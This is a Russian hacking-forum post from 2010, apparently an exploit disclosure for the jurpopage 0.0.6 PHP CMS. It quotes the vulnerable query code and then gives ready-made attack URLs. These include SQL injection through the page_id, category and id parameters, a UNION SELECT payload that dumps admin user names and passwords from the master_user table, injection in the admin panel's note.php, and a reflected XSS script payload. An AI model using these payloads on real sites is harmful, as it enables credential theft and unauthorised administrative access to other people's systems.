13.03.2010, 21:54
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
С нами:
8954306
Репутация:
1588
|
|
jurpopage
product : jurpopage-0.0.6
admin panel : /jurpopageadmin SQL injection
mq=off
index.php
PHP код:
$query = "SELECT category_id AS category FROM category WHERE page_id='$page_id' ORDER BY category_id ASC LIMIT 0,1";
$result = fn_query($conn_id,$query);
while($rows = fn_fetch_array($result)) extract($rows,EXTR_OVERWRITE);
}
$active_category_id = $category;
$query = "SELECT category_title AS active_category_title FROM category WHERE page_id='$page_id' AND category_id = '$active_category_id'";
$result = fn_query($conn_id,$query);
while($rows = fn_fetch_array($result)) extract($rows,EXTR_OVERWRITE);
if(isset($HTTP_GET_VARS["id"])) $q_note_detail ="page_id = '$page_id' AND note_id = '$id'";
else $q_note_detail ="page_id = '$page_id' AND category_id = '$active_category_id' ORDER BY note_id DESC LIMIT 0,1";
...
$q_page ="WHERE page_id = '$page_id' AND category_id = '$active_category_id' ";
result :
Код:
http://localhost/index.php?page_id=[sql]
Код:
http://localhost/index.php?page_id=1&category=[sql]
Код:
http://localhost/index.php?page_id=1&category=100&id=49'+union+all+select+1,2,concat_ws(0x3a,user_name,user_password),4+from+master_user+limit+1,1--+
jurpopageadmin/note.php
mq=off
доступ в админ панель
PHP код:
$query = "SELECT category_title FROM category WHERE page_id = '".$page_id."' AND category_id = '$category_id'";
Код:
http://localhost/jurpopageadmin/note.php?page_id=[sql]&category=[sql]
Passive XSS
mq=off
Код:
http://localhost/index.php'%22/%3E%3Cscript%3Ealert(%22xss%22);%3C/script%3E
|
|
|